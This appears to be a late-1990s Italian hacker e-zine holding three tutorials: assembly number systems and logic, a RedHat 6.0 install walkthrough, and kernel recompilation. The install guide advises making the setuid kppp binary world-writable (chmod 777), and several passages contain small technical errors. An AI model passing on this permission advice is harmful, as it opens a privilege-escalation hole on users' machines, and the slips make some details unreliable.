il nome dell'autore e il suo indirizzo. Ogni altra modalita' di utilizzo deve 
considerarsi contraria alla volonta' dell'Autore.
===========================================================================
Al giorno d'oggi esistono molti linguaggi di programmazione ad alto livello con i 
quali è possibile creare programmi complessi, piu' o meno efficienti e con i quali 
è possibile programmare ogni parte di un computer, ma se si vuole sfruttare al meglio 
le risorse messe a disposizione dal PC , se si vuole scrivere routine veloci allora 
l'unico linguaggio adatto è ancora il buon vecchio ASSEMBLY.
Programmando in Assembly si ha il controllo completo del computer ogni singolo bit 
di ogni singolo registro è nelle tue mani, hai il potere assoluto sulla macchina, 
però ...
Però e anche vero che programmare in Assembly non è del tutto facile, si deve tener 
conto di moltissime cose, un piccolo particolare trascurato ha come conseguenza il 
CRASH del sistema!! Una prerogativa della programmazione in Assembly è la conoscenza 
dell'Hardware sottostante , è quindi necessario conoscere la struttura della CPU dei 
registri delle porte e delle schede presenti per poterle programmare.
In questa serie di tutorial vorrei cercare di spiegare per passi la programmazione 
in Assembly cominciando dalle cose cose piu' semplici e via via andando sempre piu 
dentro nella programmazione dei vari componenti di un moderno Personal Computer.
Vi renderete conto voi stessi che ad un certo punto più che un corso di programmazione 
diventerà un corso di Hardware per calcolatori. I tools di cui avrete bisogno sono un 
COMPILATORE e un LINKER , i miei esempi sono scritti per il compilatore della Borland 
TASM 3.1 ma si possono facilmente adattare ad altri compilatori.
Inoltre dovreste procuravi una documentazione degli interrupt del BIOS e del DOS 
reperibile via FTP al sito : X2FTP.OULU.FI (Si tratta della famosissima lista di 
Ralph Brown).
Infine si serve un editor di testo, va bene anche l'EDIT del DOS ma vi consiglio 
un ambiente integrato per programmare in Assembly reperibile anche questo su internet 
al sito WWW.INF.TU-DRESDEN.DE/~OK3 , si tratta dell'ASM EDITOR scritto da Olaf Krusche 
e Tilo Elstner ( questo vi facilita molto il lavoro di compilazione e linkaggio).
Beh ora basta con le chiacchiere cominciamo ad addentrarci nel magnifico mondo della 
programmazione in ASSEMBLY.... buon lavoro!
Sistemi di numerazione ed elementi di logica: by b0nu$ 
Ogni buon programmatore dovrebbe conoscere almeno 2 sistemi di numerazione oltre 
quello decimale imparato alle scuole elementari: il sistema BINARIO e quello ESADECIMALE.
Il sistema di numerazione binario è particolarmente legato ai calcolatori in quanto 
essi possono riconoscere solo segnali aventi due valori : uno alto e uno basso; per 
cui si associa al valore alto la cifra binaria 1 e a quello basso la cifra binaria 0 
(oppure H e L, o ancora VERO e FALSO).
Infatti nel sistema binario esistono solo due cifre 0 e 1 appunto e i numeri ma anche 
tutte le altre informazioni vengono rappresentate con sequenze di Zero e di Uno.
Il sistema di numerazione binario è un sistema posizionale come quello decimale, cosa 
vuol dire: consideriamoli numero decimale 237 , esso può essere scomposto in questo modo:
237 = 2 * 10^2 + 3 * 10^1 + 7 * 10^0
ossia le cifre del numero vengono moltiplicate per le potenze di dieci (da cui decimale) 
crescenti da destra verso sinistra. I numeri binari vengono costruiti nello stesso modo 
solo che invece di potenze di 10 si usano le potenze di 2, quindi considerando il seguente 
numero binario, scomponendolo ed effettuando i calcoli si ottiene il corrispondente numero 
decimale :
11010010 = 1*2^8 + 1*2^7 + 0*2^6 + 1*2^5 + 0*2^4 + 0*2^3 + 0*2^2 + 1*2^1 + 0*2^0 = 210
Ora che abbiamo visto la conversione Base 10 -> Base 2 vediamo come si effettua l'operazione 
inversa.
L'algoritmo è abbastanza semplice :
1 - Si divide la cifra decimale per 2
2 - Se il quoziente è pari si scrive 0 se è dispari 1
3 - Si divide il quoziente ancora per 2 e si ripete il passo 3 
4 - La sequenza ottenuta RIBALTATA è la rappresentazione binaria del numero decimale
Vediamolo applicato al numero decimale 145 (questo è lo schema che di solito si utilizza):
                       
                             145 | 
                              72 | 1	( cifra - significativa )
                              36 | 0
                              18 | 0
                               9 | 0
                               4 | 1
                               2 | 0
                               1 | 0
                               0 | 1     (cifra + significativa )
Quindi 145 in base 10 equivale a 10010001 in base 2. Semplice vero ??
NOTA: Una cosa da notare è che con N cifre binarie possiamo rappresentare tutti i numeri 
da 0 fino a 2^N-1.
Ora che abbiamo conosciuto i numeri in base 2 andiamo a conoscere i numeri in base 16 che 
risultano utili in quanto ogni cifra esadecimale corrisponde a 4 cifre binarie e il 
passaggio da una base all'altra risulta facile.
Tanto per cominciare le cifre del Sistema esadecimale sono 16, direte 10 le conosciamo 
ma le altre 6 ?? Beh si usano anche le prime sei lettere dell'alfabeto:
     DEC    0  1  2  3  4  5  6  7  8  9  10  11  12  13  14  15  
     HEX    0  1  2  3  4  5  6  7  8  9   A   B   C   D   E   F   
Anche il sistema esadecimale è posizionale e quindi la conversione Hex ->Dec si fa nello 
stesso modo visto prima ( naturalmente si usano le potenze di 16).
Un'altra conversione che serve spesso è quella da Esadecimale a Binario e viceversa.
Sono entrambe molto semplici in quanto come dicevamo prima tutte le cifre esadecimali si 
possono codificare con quattro cifre binarie :
                                Hex             Bin
                                 0              0000
                                 1              0001
                                 2              0010
                                 3              0011
                                 4              0100
                                 5              0101
                                 6              0110
                                 7              0111
                                 8              1000
                                 9              1001
                                 A              1010
                                 B              1011
                                 C              1100
                                 D              1101
                                 E              1110
                                 F              1111
Quindi il numero esadecimale 3F5 corrisponde al 
    001111110101                                                                                
     3   F   5
Per il viceversa basta. prendere il numero binario a blocchi di 4 cifre (partendo dalla 
cifra meno significativa) e convertirli in cifre esadecimali:
10 0101 1101 0101 0010
        0010 --> 2
        0101 --> 5
        1101 --> D
        0101 --> 5
          10 --> 2
Quindi corrisponderà al numero 25D52 esadecimale !!
Un altro sistema di numerazione adottato nel campo dei calcolatori fino a qualche tempo 
fa era quello ottale (base 8), che lascio immaginare a voi come funzioni !!
In un programma assembly per specificare la base di numerazione si fa seguire al numero 
una lettera :
b - Binario (es. 0100101101b)
o - Ottale (es. 543o)
d - Decimale (es. 982d)
h - Esadecimale (es. 0F23h)
Adesso siamo in grado di rappresentare solo i numeri positivi e quelli negativi?
Per questi i calcolatori utilizzano un metodo non sempre intuitivo: il complemento a 2.
Vediamo subito un esempio per capire come funziona, consideriamo il numero 5 e 
rappresentiamolo in binario a 8 bit : 00000101, calcoliamo da questo la rappresentazione 
binaria di -5, si procede nel seguente modo :
1 - Si complementano tutti  i bit (0-->1 e 1-->0)
                00000101
                ||||||||
                11111010 
2 - al numero ottenuto si somma 1
                11111010 +
                       1
               ----------
                11111011
3 - Il numero ottenuto è la rappresentazione binaria di -5
Per fare la verifica provate a sommare 5 a -5 e vedrete che otterrete 0
(attenzione : il bit eventuale di overflow viene perso in quanto nel nostro esempio abbiamo 
specificato che stiamo usando solo 8 bit; anche in un calcolatore comunque il numero di bit 
è limitato dalla dimensione dei registri) Quindi con n bit possiamo rappresentare i numeri 
da -2^(n-1) a 2^(n-1)-1 (es. con 4 bit da -8 a 7) e il bit piu' significativo indica il segno: 
se è 1 vuol dire che il numero è negativo.
Oltre al codice binario normale a volte sono utili altre rappresentazioni binarie dei numeri 
decimali (utili come vedremo piu' avanti per le operazioni algebriche) come ad esempio la 
notazione BCD (Binary Code Decimal). In BCD le 10 cifre del codice decimale vengono codificate
una ad una con 4 bit nel seguente modo:
        Decimale  0    1    2    3    4    5    6    7    8    9   
           BCD   0000 0001 0010 0011 0100 0101 0110 0111 1000 1001
Così per rappresentare il numero decimale 145 basta codificare le sue cifre (1,4 e 5) con il 
rispettivo codice BCD :
145 --> 101000101
L'Assembly non è un linguaggio tipizzato, nel senso che non esiste il tipo int, float, ecc...
sta al programmatore trattare i numeri in modo diverso a seconda di cosa essi rappresentano 
nel momento in cui li usa.
In binario vengono rappresentati anche i caratteri. Per ogni carattere si usano 8 bit, per un 
totale di 255 caratteri, per le corrispondenze carattere-codice si fa riferimento alla 
convenzione ASCII. Tutti abbiamo da qualche parte una tabella dei codici ASCII.
Oltre a saper rappresentare i numeri binari bisogna saper fare anche le operazioni con essi,
spendero' solo poche parole ma una volta capito il meccanismo di base riuscirete benissimo a 
risolvere complesse operazioni !!!.
Per capire come si effettua una somma basta pensare a cosa avviene con i numeri in base 10 e 
ricordarsi che in base 2 ci sono solo due cifre.
Quindi (in base 10) se sommo 7 a 6 scrivo 3 con il riporto di 1, sommo il riporto a 0 e 
unendo i risultati ottengo (magia) 13.
In decimale il riporto si ha quando la somma supera 10 in binario quando la somma supera 2, 
quindi ad esempio:
                10100011 +
                10100101
               ----------
               101001000
Provate a fare qualche esempio vedrete che è facilissimo, l'importante è aver capito il 
meccanismo che sta alla base (se proprio non lo capite andate a rileggervi i quaderni delle 
elementari !!!!)
Ora che abbiamo capito come fanno a "contare" i computer vediamo come fanno a fare altre 
utili operazioni, guardiamo in particolare le operazioni logiche. La logica è un ramo della 
matematica che stabilisce se un predicato è vero o falso(chiedo scusa ai matematici per la 
definizione un po'troppo semplicistica), quindi noi assegneremo il valore 1 a vero e il 
valore 0 a falso e il gioco è fatto.
Le principali sono: AND, OR, NOT, XOR.
Noi ci chiederemo cosa risulta 1 and 1 oppure 0 or 1 ecc...
Per brevità e data la semplicità riporto solo le tabelle di verità di queste operazioni 
logiche, in ingresso avremo una o due variabili binarie X e Y e in uscita verrà prodotta 
la variabile Z che varrà 0 o 1 a seconda dell'operazione logica; quindi:
  AND   X  Y  | Z
        0  0  | 0
        0  1  | 0               Z = X and Y
        1  0  | 0
        1  1  | 1
  OR    X  Y  | Z
        0  0  | 0
        0  1  | 1               Z = X or Y
        1  0  | 1
        1  1  | 1
  XOR   X  Y  | Z
        0  0  | 0
        0  1  | 1               Z = X xor Y             (or esclusivo)
        1  0  | 1
        1  1  | 0
  NOT       X | Z        
            0 | 1    Z= not X    ( il NOT a differenza degli altri è un  
            1 | 0                  operatore unario: opera su una sola  
                                   variabile)
		
Questo è quello che si chiama condensato di logica però è tutto quello che ci serve 
sapere sulle operazioni, se volete approfondire il concetto contattatemi e sarò lieto 
di darvi altre informazioni su questo campo della matematica 8-)
Beh ora penso di avervi stufato abbastanza con tutta questa matematica ma ritengo che 
una buona comprensione di questi argomenti faciliti molto la comprensione di quello che 
faremo in futuro, infatti con il linguaggio Assembly si lavora principalmente con numeri 
esadecimali, quindi resistete e fate un po' di esempi per capire se avete capito.
Per richieste, consigli, suggerimenti, aiuti, contributi, ecc..., contattatemi 
b0nu$, Emanuele DelBono 
via Bazoli 27
25127 Brescia
Tel 030 - 314591
e-mail : bonus@numerica.it

hAck & c ya :-) 
--------------------------------------------------------------------------------
** bonus@numerica.it **

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-


 _____          _                    _     _                  
/  ___|        (_)                  | |   (_)     BoBo & LaNdo            
\ `--.  ___ _____  ___  _ __   ___  | |    _ _ __  _   ___  __
 `--. \/ _ \_  / |/ _ \| '_ \ / _ \ | |   | | '_ \| | | \ \/ /
/\__/ /  __// /| | (_) | | | |  __/ | |___| | | | | |_| |>  < 
\____/ \___/___|_|\___/|_| |_|\___| \_____/_|_| |_|\__,_/_/\_\



			INSTALLARE LINUX: by LiQUID  				

'ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ"+- +- +- +- +- +- +- +- +- 
'º Installare Linux            º-=-=-=-=-=-=-=-=-=-=-=-=-=-
'ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÎÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ"
                              °º Powered by [LiQUID]      º
Indice:                       ²ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ1/4
00 Indice ;)                  °º\            /       /$#@ ]
01 Disclaimer                 ²º \++++++++++/-------/ $#@ ]
02 Cos'e' Linux                °º  \        /       /  $#@ ]
03 Parte 1, installazzione    ²º   \      /\      /   $#@ ]
04 Appendice 1                °º    \    /  \    /    $#@ ]
05 Appendice 2                °º    \    /  \    /    $#@ ]
    ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿    ²º     \  /    \  /     $#@ ]
    ³ liquido@freemil.it ÃÄÄÄÄÄ1/4+-+-+-\/+-+-+-\/+-+-+-+#@ ]
    ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
Disclaimer
Prima di iniziare vorrei dire che l'autore (io) non puo' essere coinvolto 
o ritenuto colpevole se succedesse qualcosa di ....strano ;) Inoltre non 
promette nulla riguardo il corretto funzionamento di questa semplice tecnica. 
Se pensate di essere coinvolti in qualsiasi maniera in brutte faccende 
leggendo il testo qui di seguito, fermatevi immediatamente e cancellate 
questo sporco pugno di bit dal vostro picci! ;-P
Se per caso voi veniste coinvolti lo spirito di affrontare questa spiacevole
situazione e': 'Io non c'ero, non sono mai esistito, non ne ho la piu' pallida
idea di come quello sporco pugno di bit sia finito nel mio picci'!'
Salve a tutti.....be' vediamo come posso incominciare?? Innanzitutto questo articolo 
parlerà su come installare correttamente linux sul proprio sistema. Prima di partire 
con l'installazione vera e propria ci terrei a fare una piccola introduzione sul 
sistema linux, appunto.
Che Cos'e' Linux?
Linux e' una emulazione gratuita di UNIX per personal computer (386-Pentium PRO),
Digital Alpha, PowerPC, Sun SPARC, Apple Macintosh, Atari ST/TT, Amiga, MIPS, che supporta
in pieno multitasking (può eseguire più operazioni nello stesso momento), multi-user 
(supporta più utenti, anche sulla stessa macchina), multithreading, multiplatform 
(e' in grado di girare su differenti piattaforme , non solo INTEL ma anche Digital Alpha,
PowerPC, Sun SPARC, Macintosh e MIPS), prevede funzioni di protezione della memoria tra 
processi (in maniera tale da 
non consentire ad un solo programma di mandare in crash l'intero sistema), X Windows, 
TCP/IP, ottima capacita' di comunicazione con altri sistemi operativi (quali quelli della 
Microsoft, Apple, Novell) e molto altro ancora. Le sue radici sono profondamente radicate 
in Internet. Le prime versioni del sistema sono state sviluppate interamente da Linus 
Torvalds (torvalds@transmeta.com) presso l'Universita' di Helsinki in Finlandia, ma cio' 
che rende Linux cosi' diverso e' il fatto di essere cresciuto grazie all'aiuto di 
moltissimi ed eterogenei gruppi di programmatori UNIX ed esperti di Sistemi Operativi 
che hanno messo a disposizione il codice sorgente da loro prodotto, gratuitamente. Questa
eterogeneita' si riferisce sia alle competenze tecniche e al settore di provenienza che 
alla dislocazione geografica. Affinche' queste comunita' di programmatoripotessero lavorare
insieme era necessario un efficiente strumento di comunicazione. Lo strumento fu Internet 
ed essendo Linux il sistema operativo scelto da queste persone, significa che gli strumenti
e le utility necessarie ad utilizzare la Rete furono tra le prime a comparire.
Oltre ad essere sviluppate appositamente per Linux, molte delle applicazioni furono portate 
da quello che era il miglior software disponibile in quel momento sul mercato. 
Per esempio, il compilatore C e' gcc (della Free Software Foundation): si tratta di un 
compilatore che viene comunemente utilizzato su piattaforma HP e Sun. In 7 anni Linux e' 
diventato il sistema operativo piu' evoluto tecnicamente dell'intera categoria e - a causa 
della disponibilita' dei sorgenti - e' diventato il punto di riferimento per lo sviluppo 
del kernel da parte di Microsoft e SCO. Inoltre molti degli sviluppatori di 
Solaris/QNX/AIX/SCO e NT, quando vanno a casa la sera - riscrivono e aggiungono le loro 
uniche e talvolta proprietarie tecnologie nel codice pubblico di Linux in modo che tutti 
gli altri possano utilizzarle. Questi sono i punti principali che rendono linux il s.o. 
più utilizzato da programmatori professionisti e non (data la semplicità di modificarlo 
od ampliarli, avendo a disposizione il codice completo del kernel e di tutti i programmi 
linux). Inoltre e' anche da aggiungere la nota affidabilità in ambito di sicurezza, in 
quanto e' stato adottato anche dalla NASA (Wow).
Ora che ho finito (FINALMENTE!!!) questa pallosissima introduzione su qusto magnifico 
s.o., possiamo procedere con l'installazione vera e propria.
LINUX, PARTE 1 - INSTALLAZIONE
Questa breve nota e' rivolta a tutti coloro che, spaventati dai primi insuccessi, hanno 
desistito dal tentativo di installare Linux, privandosi così della possibilità di conoscere 
e adoperare questo potente e affascinante sistema operativo (S.O.). Consapevole delle 
difficoltà che può incontrare un principiante cerchiamo di chiarire alcuni punti che 
possano aiutare chi vuole iniziare a lavorare con Linux.  
Premetto che il mio punto di riferimento sarà il CD-ROM della rivista Inter.Net del mese 
di giugno, facilmente reperibile. Quindi se vi trovate in difficoltà perché alcune voci 
che io menzionerò non combaciano con quelle che appariranno a VOI sullo schermo, non 
prendetevela con me.....forse state installando una distribuzione del S.O. diversa da 
quella citata sopra. Per la cronaca io procederò con l'installazione della distribuzione 
RedHat 6.0.
Prima di tutto vi dovrete creare un disco boot di installazione, detto anche disco di 
immagine, ovvero il disco che fa partire l'installazione di Linux.
Quindi apriamo il programma per crearci il disco d'immagine facendo:
C:\> d:
D:\> cd  redhat\dosutils
D:\redhat\dosutils> rawrite
Enter disk image source file name: ..\images\boot.img
Enter target diskette drive: a:
Please insert a formatted diskette into drive A: and
press --ENTER-- : [Enter]
D:\dosutils>
Perfetto, ora abbiamo creato il nostro meraviglioso disco boot.
Schiaffiamolo dentro il lettore floppy e riavviamo!
Ora ci dovrebbe apparire qualcosa del tipo: 
Loading initrd.img.........
Loading vmlinuz.........
Welcome to Red Hat Linux!
OKI, siamo nel programma di installazione J
Spingete invio, vi si chiederà la lingua, scegliete e premete invio, poi scegliete anche 
la tastiera: it. A questo punto il programma di installazzione chiederà da dove si vuole 
installare Linux. Noi scegliamo la voce CD-ROM, e confermiamo con invio. Apparirà una 
finestra: inserire il vostro Red Hat CD nel lettore; confermiamo anche qui con invio.
Poi apparirà una finestra che chiederà se aggiornare o installare il sistema. Scegliete 
installare. Apparirà una finestra con suscritto: che tipo di sistema volete installare?...,
e poi una piccola lista: Server, Workstation, e Custom. Optate per Custom. Alla domanda 
se avete il controller SCSI, fate voi, io non ne ho J.
Quindi si dovrà scegliere quale programma usare per partizionare l'HD. Io uso Disk Druid.
Ora dovete aggiungere una partizione swap ed una native. Iniziamo col cancellare HDA1, 
premendo delete (poi la riaggiungeremo, non vi speventate J. Iniziamo ad aggiungere 
quella native. Quando premiamo aggiungi ci verrà un'altra finestra. In Mount point mettiamo
 /, mentre in Size (megs) bisogna mettere lo spazio da dedicare alla partizione. Ricordatevi 
che bisogna aggiungere anche la mini partizione swap. Io la metto da 125 Mb, forse e' un po' 
troppo ma di spazio ne ho da vendere. In teoria dovrebbe essere un po' più della RAM
effettiva, ma come ho già detto, non mi faccio problemi di spazio J. In Type scegliamo 
la voce Linux Native.
Se tutto e' filato liscio, aggiungiamo la partizione swap. In Mount lasciamo vuoto e in 
Size lo spazio rimanente, in Type: Swap. Abbiamo finito con  le partizioni. Premere ok 
e alla finestra area di swap attiva selezionate solo /dev/hdc5, confermando con ok.
Apparirà quindi una finestra con 'partizione  da formattare'. Selezionate /dev/hdc1
Ok e qui abbiamo finito questa prima parte.
Passiamo ora a selezionare i vari pacchetti da installare.
Printer Support: io non lo metto, tanto la stampante la usa solo mio padre ;-P
X Windows System: si, certo
Gnome: no, poiche' ho sentito dire che lo Gnome e' troppo bucato, cmq preferisco il Kde
KDE: si, l'ho detto prima ;)
Mail/www et tools: si, ci serviranno, ovviamente
Dos/Windows connectivity: beh, per ora mettetelo, all'inizio può sempre servire
File managers: certo ;)
Graphics manipolation: a me piace, io lo metto, mi diverto con la gerafica ;)
Consol Games: non lo metto, tanto se devo giocare vado sotto il Windozzo
X games: setesso discorso di prima
Consol multimedia: si, la bouna musica gothic fa SEMPRE bene!
X multimedia support: idem, come prima
Net Woeked Workstation: si, certo
Dialup Workstation: si
News server: no, grazie
Nfs server: ma neanche...
Smb (Samba) connectivity: si, e' carino, ci potrà servire per qualche netbios sparso per           
la rete ;)
Ipx/netware connectivity: no, non mi serve
Anonimus ftp server: be' per me e' utile per scambiare file con amici....
Web server: no
Dns name sever: no
Post gres sql server: no
Network management workstation: si
Text Document formatting: no
C Developement: naturalmente, ci serviranno tutte le libreire c!
Developement libraries: certo, vedi sopra
C++ developement: ricerto, rivedi sopra
X developement: riricerto, ririvedi sopra
Gnome developement: abbiamo il kde.....
Kernel developement: no, non e' che voglia impedirvi la configurazione del kernel ;), ma 
questa voce non c'e' nel CD-ROM, e cmq nell'altro CD-ROM ci sono i kernel più aggiornati
Extra documentation: no, grazie
Tutto: secondo voi per cosa mi sono corroso le dita fino ad ora?
Perfetto, ora abbiamo finito anche con questa parte. 
Il sistema procedrà con la copia dei file sull'HD. Quindi il Linuzzo ci dirà di aver 
piazzato i log di installazzione in /tmp/install.log. Si creerà il file system ext, e 
ci dirà che sta cercando l'overlopping, infine installerà il tutto.
Ci dirà che ha rilevato il mouse in ttyS0 (se lo avete in com1, guardate l'appendice porte).
 Dovremo configurare il mouse, il mio e' terrone di una marca finllandese di merda e poi 
mi scoccia cercare, quindi seleziono un Mouse Micro$oft Compatible (serial). Emulare i 3 
tasti? Si graxie. 
Alla finestrina di configurazione di rete (la rete LAN), mettiamo no; ed alla 
configurazione del Time-Zone selezionate Europe/Rome.
A questo punto dobbiamo togliere i demoni che non serveono (nota: se all'avvio di Linux 
troverete delle scritte FAILED in rosso, molto probabilmente avete sbagliato questa parte,
ma non dovrete reinstallare tutto da capo, xche' si possono cambiare da dentro Linux J. Ok,
i Demoni da togliere sono questi:atd, crond, lpd, nfs, pmcia, portmap, random, sendmail. 
Anche questa operazione e' finita. 
Configurazione stampante: volete configurare la stampante? Io metto no, ho già detto 
sopra che non la uso.
Passwd di ROOT: Inserite la password di root. Dovete digitare due volte la pass. Per
 evitare errori di digitazione. Ricordatevi che la password di root e' un aspetto critico
 per la sicurezza del sistema ;)) ok, digitate la pass, ed il gioco e' fatto!
Autentication configuration:
[ ] enable nis
[*] use shadow passwd
[*] use md5 passwd.
Ok, segnate come sopra e premete invio.
BOOT DISK
Io uso Lilo, quindi del boot disk non me ne faccio nulla, e segno NO.
All'installazione di Lilo dovete installare il boot loader in /dev/hda Master Boot Record.
Poi dovete decidere quale sistema avviare di default, usando il tasto F2 per cambiare 
selezione.
PCI Probe: ****
PCI entry:****
X SERVER:****
Ok, perfetto a me ha rilevato tutto correttamente ( che culooooo J
Monitor setup: il mio monitor e' anche questo terrone e non c'e' nella lista, quindi premo
Custom, e confermo con ok.
Ancora ok, e poi premo 800*600 (sto monitor del cazz' mi regge solo questa risoluzione L)
Continuo il setup del monitor, selezionando 50-70. Quindi dirà che deve testare le 
impostazioni, per cui si preme ok e il video lampeggerà un po'. Vi confermerà la 
conclusione del test. Poiché a me ha dato i risultati giusti, ho premo Uso di default,
altrimenti avrei dovuto scegliere manualmente le impostazioni. Si avvierà l'ambiente X 
per vedere se tutto e' ben configurato, e premiamo sul pulsante prima dei 9 secondi, 
altrimenti il Linuzzo penserà che non avremo visto nulla.
Chiederà se vogliamo avviare l'ambiente X all'avvio del sistema (io metto no, sono 
innamorato della shell J.
CONGRATULAZIONI L'INSTALLAZIONE E' TERMINATA!!!!!
Ok ora il nostro piccì si riavvierà. Al login scriveremo root, e la nostra pass. Dovremo
trovarci nella shell. Quindi configuriamo la connessione. 
Digitiamo vi /etc/ppp/options
Premiamo il tasto Esc + dd, poi :wq (per maggiori spiegazioni guardare l'appendice con i
comandi del vi). Con questo togliamo la parola lock dalla 1° riga, ed usciamo salvando.
Scriviamo echo x.x.x.x > /etc/resolv.conf (dove x.x.x.x e' l'indirizzo numerico del vostro
server). Andiamo in /usr/bin con un cd /usr/bin e scriviamo chmod u+s+ kppp, poi chmod 777 
kppp. Ok, avviamo X premendo startx.
Qui andiamo sulla K > Internet > Kppp. Ora accounts > nuovo.
Nome connessione: quellochevolete
Numero Tel: il tel del vostro provider.
Autenticazione: PAP
Andate su Ip e selezionate Indirizzo dinamico. Su DNS aggiungete il DNS del vs. provider, 
e selezionatelo. Su Gateway, selezionate Gateway predefinito. Su script di accesso lasciate
tutto com'e'. Su costi telefonici Italy > TUT e premete OK
Andate su Modem e come porta selezionate /dev/ttyS1
Velocità 115200.
Poi andate su Comandi Modem: e nella Stringa di inizializzazione al posto di ATZ scrivete 
ATX3&F e su Stringa di chiamata sostituite ad ATDT ATX3DT.
Col mio modem riesco a connettermi, se avete problemi andate a controllare sul libretto del
vs modem. Premete OK.
Ritornati al kppp inserite user e passwd, e BUONA NAVIGAZIONE (ps se avete bisogno di 
Netscape andate in /usr/bin/netscape ;)
Le ultime righe. Dobbiamo rendere il ns. sistema sicuro (wow). Andate a modificare il 
file /etc/hosts.deny ed aggiungete ALL:ALL. in questo modo negate l'accesso a tutti gli 
hosts remoti sul vs sistema.
Per ora e' tutto, la prossima volta (se mai ci sarà) configureremo il kernel.
APPENDICE 1: comandi VI
ESC i entra in modalità inserimento 
ESC o aggiungi una riga sotto il cursore ed entra in modalità inserimento 
ESC O aggiungi una riga sopra il cursore ed entra in modalità inserimento 
ESC x cancella la lettera sotto il cursore 
ESC dd cancella la riga in cui si trova il cursore 
ESC :w salva il file 
ESC :w nome_file salva il file con nome nome_file 
ESC :q esci da Vi 
ESC :wq salva e esci 
ESC /chiave per cercare la parola chiave specificata dopo /. Usare poi n e p per 
ricercare le ulteriori istanze, seguenti o antecedenti, della parola. 
APPENDICE 2: PORTE 
Cua0 sta per COM1, cua1 sta per COM2 ecc.
ttyS0 equivale a cua0, ttyS1 a cua1,  e cosi' via...
hda e' l'hard disk IDE primario, hda1, hda2 ecc. sono le partizioni presenti.
hdb e' l'hard disk IDE secondario, per le partizioni stesso discorso.
hdsa e' l'hard disk SCSI primario.
tty1, tty2 ecc. sono i terminali locali.
ttyP0, ttyP1 ecc. sono i terminali remoti.

by [LiQUID]
liquido@freemail.it






+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-



					RICOMPILAZIONE DEL KERNEL: by LaNdo

in tv: è spenta (mica mi voglio rincoglionire sono le 7:30am)
mi sono deciso a scrivere quest'articolo supplementare perchè insieme a
BoBo pensavamo che non tutti fossero capaci di ricompilare il kernel...
cominciamo con un po' di teoria:
Esistono 2 tipi di kernel monolitico e modulare:
- i kernel monolitici aspetto negativo: sono compilati per essere 
caricati in ram all'avvio e non essere più toccati (es: avete 
compilato il kernel (tutto monolitico) e volete cambiare irq o dma alla 
vs scheda sonora ...: dovrete ricompilare il kernel con le nuove 
impostazioni...; aspetto positivo: è più veloce in quanto ha tutti i 
"drivers" necessari caricati già in ram...; sistemi operativi che 
adottano questo tipo di kernel sono Sco OpenServer e Linux.
- i kernel modulari aspetto positivo: per cambiare un irq ad un driver 
compilato come modulo non c'è bisogno di ricompilare tutto il kernel,.. 
basta modificare il relativo file di configurazione e riavviare il pc; 
altro aspetto positivo: occupa meno memoria in quanto carica i 
"drivers" (da ora in poi moduli) quando gli occorrono; aspetto 
negativo: il sistema impiega più tempo quando necessita di un modulo 
che non ha caricato e che deve caricare; sistemi operativi che adottano 
questo tipo di kernel sono Linux e Sco UnixWare 7.
Non a caso ho inserito Linux in entrambe le categorie, con Linux è 
infatti possibile (in fase di compilazione) decidere il tipo di kernel 
da utilizzare,... un mio consiglio: usate il kernel modulare
ok basta teoria ... ora un po' di pratica :-)
iniziamo:
se avete già installato i sorgenti potete saltare questa fase...
(per default farò finta che il kernel da compilare sia il 2.2.11)
 cd /usr/src (la dir dei sorgenti)
 rm linux (rimuoviamo il link simbolico che punta alla dir dei 
sorgenti)
 mkdir linux-2.2.11 (creiamo la dir in cui copieremo il kernel)
 ln -s linux-2.2.11 (creiamo un link alla dir del kernel)
 tar xzvf /percorso/linux-2.2.11.tar.gz ./ (al posto del percorso 
dovrete mettere la dir in cui si trova il kernel compresso)
 rm -rf linux-2.2.10 (il kernel vecchio)
 cd linux
ok ora avete copiato il kernel... bisogna configurarlo...
Esistono 3 modi per configurare il kernel:
- tramite gui (grafic user interface) da xwindow (non ci mettete la s 
finale perchè non si chiama Xwindows (brrr ... orrore .. mi ricorda Wincess))
- tramite caratteri semigrafici da una shell
- tramite interfaccia testuale (un po' complicato, se sbagliate una 
cosa dovete ricominciare d'accapo... lasciatela se possibile)
la seconda è la mia preferita :-) ... a voi la scelta:
- make xconfig (lo dovete far partire da una finestra di Xwindow)
- make menuconfig (da una shell)
- make config (da una shell)
sceglietene solo uno !!!!!
ora vi appariranno tutte le impostazioni... se sapete un po' d'inglese 
ok... altrimenti prendetevi un vocabolario ... per ogni voce c'è cmq la 
spiegazione ...
ps: quando selezionate una voce vi possono apparire: un asterisco *
(che vuol dire che state configurando quella voce come monolitica, una M
che vuol dire che la state configurando come modulo,  o uno spazio 
vuoto  che vuol dire che non volete quella voce...
quando avete finito salvate la configurazione... e uscite al prompt
adesso viene la compilazione vera e propria... mettetevi pure comodi 
... al prompt digitate:
make dep; make clean; make bzImage; make modules; make modules_install; depmod -a
.... dovrete aspettare un po'... dipende dalla cpu....
ok appena terminato copiamo il nuovo kernel nella sua dir:
cp /usr/src/linux/arch/i386/boot/bzImage /boot/vmlinuz-2.2.10
ora bisognerà aggiornare lilo:
vi /etc/lilo.conf
e aggiungete le seguenti linee:
image= /boot/vmlinuz-2.2.10
root= /dev/sda2         (hd e partizione in cui è installato linux)
label= linux            (dovrete cambiare il label del kernel vecchio)
read-only
ora uscite dal vi e aggiornate il mbr digitando:
lilo
e ora riavviate .. sperando che non abbiate combinato casini con:
shutdown -r now
